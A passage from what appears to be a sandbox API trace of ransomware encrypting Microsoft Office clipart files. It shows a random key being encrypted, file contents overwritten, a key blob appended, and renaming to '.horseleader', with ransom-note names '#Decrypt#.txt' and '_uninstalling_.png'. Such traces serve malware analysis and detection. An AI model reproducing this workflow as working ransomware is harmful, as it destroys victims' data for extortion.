(in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x414, lpOverlapped=0x0) returned 1 [0253.663] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.664] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.664] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.664] CloseHandle (hObject=0x158) returned 1 [0253.664] GetProcessHeap () returned 0x780000 [0253.664] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.664] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.horseleader") returned 79 [0253.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.horseleader")) returned 1 [0253.665] GetProcessHeap () returned 0x780000 [0253.665] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.665] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5295200, ftCreationTime.dwHighDateTime=0x1bd4b23, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc5295200, ftLastWriteTime.dwHighDateTime=0x1bd4b23, nFileSizeHigh=0x0, nFileSizeLow=0x876, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00136_.WMF", cAlternateFileName="")) returned 1 [0253.665] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="Windows") returned -1 [0253.665] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0253.665] StrStrIW (lpFirst="BS00136_.WMF", lpSrch=".horseleader") returned 0x0 [0253.665] lstrcmpW (lpString1="BS00136_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.665] lstrcmpW (lpString1="BS00136_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.665] lstrlenW (lpString=".testttjffg") returned 11 [0253.665] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0253.665] StrStrW (lpFirst="BS00136_.WMF", lpSrch=".txt") returned 0x0 [0253.665] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2166) returned 1 [0253.666] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x876, lpOverlapped=0x0) returned 1 [0253.668] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff78a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x876, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x876, lpOverlapped=0x0) returned 1 [0253.668] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.668] CloseHandle (hObject=0x158) returned 1 [0253.668] GetProcessHeap () returned 0x780000 [0253.668] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.668] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.horseleader") returned 79 [0253.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.horseleader")) returned 1 [0253.669] GetProcessHeap () returned 0x780000 [0253.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.669] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99a2a00, 
ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99a2a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00145_.WMF", cAlternateFileName="")) returned 1 [0253.669] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="Windows") returned -1 [0253.669] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0253.669] StrStrIW (lpFirst="BS00145_.WMF", lpSrch=".horseleader") returned 0x0 [0253.669] lstrcmpW (lpString1="BS00145_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.669] lstrcmpW (lpString1="BS00145_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.669] lstrlenW (lpString=".testttjffg") returned 11 [0253.669] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.669] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0253.671] StrStrW (lpFirst="BS00145_.WMF", lpSrch=".txt") returned 0x0 [0253.671] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1712) returned 1 [0253.671] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6b0, lpOverlapped=0x0) returned 1 [0253.673] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff950, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6b0, lpOverlapped=0x0) returned 1 [0253.673] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.673] CloseHandle (hObject=0x158) returned 1 [0253.673] GetProcessHeap () returned 0x780000 [0253.673] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.horseleader") returned 79 [0253.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS00145_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.horseleader")) returned 1 [0253.674] GetProcessHeap () returned 0x780000 [0253.674] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.674] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca47100, ftCreationTime.dwHighDateTime=0x1bd4af0, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7ca47100, ftLastWriteTime.dwHighDateTime=0x1bd4af0, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00174_.WMF", cAlternateFileName="")) returned 1 [0253.674] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="Windows") returned -1 [0253.674] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0253.674] StrStrIW (lpFirst="BS00174_.WMF", lpSrch=".horseleader") returned 0x0 [0253.674] lstrcmpW (lpString1="BS00174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.674] lstrcmpW (lpString1="BS00174_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.674] lstrlenW (lpString=".testttjffg") returned 11 [0253.674] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.674] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.674] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.675] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0253.675] StrStrW (lpFirst="BS00174_.WMF", lpSrch=".txt") returned 0x0 [0253.675] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8366) returned 1 [0253.675] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x20ae, lpOverlapped=0x0) returned 1 [0253.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdf52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x20ae, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x20ae, lpOverlapped=0x0) returned 1 [0253.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.677] CloseHandle (hObject=0x158) returned 1 [0253.678] GetProcessHeap () returned 0x780000 [0253.678] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0253.678] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.horseleader") returned 79 [0253.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.horseleader")) returned 1 [0253.678] GetProcessHeap () returned 0x780000 [0253.678] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.678] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f738600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7f738600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x1370, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00184_.WMF", cAlternateFileName="")) returned 1 [0253.679] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="Windows") returned -1 [0253.679] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0253.679] StrStrIW (lpFirst="BS00184_.WMF", lpSrch=".horseleader") returned 0x0 [0253.679] lstrcmpW (lpString1="BS00184_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.679] lstrcmpW (lpString1="BS00184_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.679] lstrlenW (lpString=".testttjffg") returned 11 [0253.679] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF", lpSrch=".testttjffg") 
returned 0x0 [0253.679] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.679] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0253.680] StrStrW (lpFirst="BS00184_.WMF", lpSrch=".txt") returned 0x0 [0253.680] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4976) returned 1 [0253.680] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1370, lpOverlapped=0x0) returned 1 [0253.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.681] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1370, lpOverlapped=0x0) returned 1 [0253.682] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.682] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 
lpOverlapped=0x0) returned 1 [0253.682] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.682] CloseHandle (hObject=0x158) returned 1 [0253.682] GetProcessHeap () returned 0x780000 [0253.682] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.horseleader") returned 79 [0253.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.horseleader")) returned 1 [0253.683] GetProcessHeap () returned 0x780000 [0253.683] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.683] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c60b600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c60b600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x31f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00186_.WMF", cAlternateFileName="")) returned 1 [0253.683] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="Windows") returned -1 [0253.683] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 
67 [0253.683] StrStrIW (lpFirst="BS00186_.WMF", lpSrch=".horseleader") returned 0x0 [0253.683] lstrcmpW (lpString1="BS00186_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.683] lstrcmpW (lpString1="BS00186_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.683] lstrlenW (lpString=".testttjffg") returned 11 [0253.683] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.683] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.683] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 67 [0253.685] StrStrW (lpFirst="BS00186_.WMF", lpSrch=".txt") returned 0x0 [0253.685] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12788) returned 1 [0253.685] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x31f4, lpOverlapped=0x0) returned 1 [0253.686] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffce0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.686] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x31f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x31f4, lpOverlapped=0x0) returned 1 [0253.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.687] CloseHandle (hObject=0x158) returned 1 [0253.687] GetProcessHeap () returned 0x780000 [0253.687] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.687] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.horseleader") returned 79 [0253.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.horseleader")) returned 1 [0253.688] GetProcessHeap () returned 0x780000 [0253.688] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.688] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9efd600, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9efd600, 
